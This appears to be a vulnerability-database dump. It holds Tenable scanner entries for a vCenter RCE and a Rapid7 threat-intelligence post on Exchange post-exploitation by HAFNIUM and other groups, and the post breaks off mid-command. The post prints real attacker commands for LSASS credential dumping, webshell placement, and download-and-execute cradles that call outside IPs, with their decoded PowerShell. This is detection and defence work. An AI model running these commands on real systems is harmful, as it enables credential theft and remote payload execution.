: TRUE\n);\n\nif ('400' >< res[0] && ('Unable to install plugin' >< res[2] || 'All plugins could not be validated' >< res[2]))\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : res[0] + res[2]\n );\n}\nelse\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:install['path'], port:port));\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-10T19:22:13", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "nessus", "title": "VMWare vCenter Server 6.5 < 6.5 U3p / 6.7 < 6.7 U3n / 7.0 < 7.0 U2b Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113244", "href": "https://www.tenable.com/plugins/was/113244", "sourceData": "No source data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-07T15:09:27", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U2b, 6.7 before 6.7 U3n, and 6.5 before 6.5 U3p) and VMware Cloud Foundation (4.x before 4.2.1 and 3.x before 3.10.2.1).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "VMware vCenter Server Virtual SAN Health Check plug-in RCE (CVE-2021-21985) (direct check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21985.NBIN", "href": "https://www.tenable.com/plugins/nessus/150163", "sourceData": "Binary data vmware_vcenter_cve-2021-21985.nbin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-23T17:16:33", "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. These devices also commonly fall outside of standard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is disclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to test and deploy fixes while adhering to change control process for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold are simple [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) attacks against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker to spawn processes through the China Chopper webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default, IIS when configured for Microsoft Exchange\u2019s Outlook Web Access, it will have an environment variable and value set to the following:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that would match anytime any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. \n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcudmp.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * [T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * [T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * [T1505](<https://attack.mitre.org/techniques/T1505/>) \\- Server Software Component\n * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) \\- Server Software Component: Web Shell\n * [T1518](<https://attack.mitre.org/techniques/T1518>) \\- Software Discovery\n * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) \\- Software Discovery: Security Software Discovery\n * [T1531](<https://attack.mitre.org/techniques/T1531>) \\- Account Access Removal\n * [T1583](<https://attack.mitre.org/techniques/T1583>) \\- Acquire Infrastructure\n * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) \\- Acquire Infrastructure: Virtual Private Server\n * [T1587](<https://attack.mitre.org/techniques/T1587>) \\- Develop Capabilities\n * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) \\- Develop Capabilities: Malware\n * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) \\- Develop Capabilities: Exploits\n * [T1588](<https://attack.mitre.org/techniques/T1588>) \\- Obtain Capabilities\n * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) \\- Obtain Capabilities: Malware\n * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) \\- Obtain Capabilities: Tool\n * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) \\- Obtain Capabilities: Exploits\n * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) \\- Obtain Capabilities: Vulnerabilities\n * [T1595](<https://attack.mitre.org/techniques/T1595>) \\- Active Scanning\n * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) \\- Active Scanning: Scanning IP Blocks\n * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) \\- Active Scanning: Vulnerability Scanning\n\n## Non-HAFNIUM-related activity\n\nRapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange vulnerabilities in recent weeks by several other attackers other than HAFNIUM. We have grouped these and distilled the unique type of commands being executed into the individual sections shown below.\n\n### Minidump and Makecab attacker\n\nThis attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952\\(v=ws.11\\)>) to enumerate all users from the Active Directory domain. The attacker would also use the [Minidump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in others reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\n \n \n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n dsquery * -limit 0 -filter objectCategory=person -attr * -uco\n powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Minidump via COM Services DLL\n\n### Malicious DLL attacker\n\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>), in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.\n \n \n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c net time /do\n net time /do\n c:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n c:\\windows\\system32\\cmd.exe /c klist\n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c netstat -ano\n netstat -ano\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Opera Browser and Cobalt Strike attacker\n\nThis attacker was seen using common techniques to download scripts with Microsoft\u2019s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. The eventual end of this execution would result in the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a favorite tool of attackers that distributes ransomware:\n \n \n C:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA\n msiexec.exe -k\n powershell Start-Sleep -Seconds 10\n cmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\opera\\opera_browser.png')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\opera\\opera_browser.dll')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\opera\\opera_browser.exe')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Download And Execute With Background Intelligent Transfer Service\n * Attacker Technique - URL Passed To BitsAdmin\n\n### Six-character webshell attacker\n\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\n \n \n cmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_6_CHARACTER_STRING>.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Encoded PowerShell download cradle attacker\n\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. The would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.\n \n \n cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==\n C:\\Windows\\system32\\getmac.exe /FO CSV\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - PowerShell Download Cradles\n\n### Ten-character webshell attacker\n\nThis attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be read-only recursively. Additionally, the attacker would use the attrib.exe utility to set the file containing the webshell to be marked as hidden and system to make finding these more difficult.\n \n \n C:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\error.aspx\" \"c:\\Program Files\\Microsoft\\Exchange 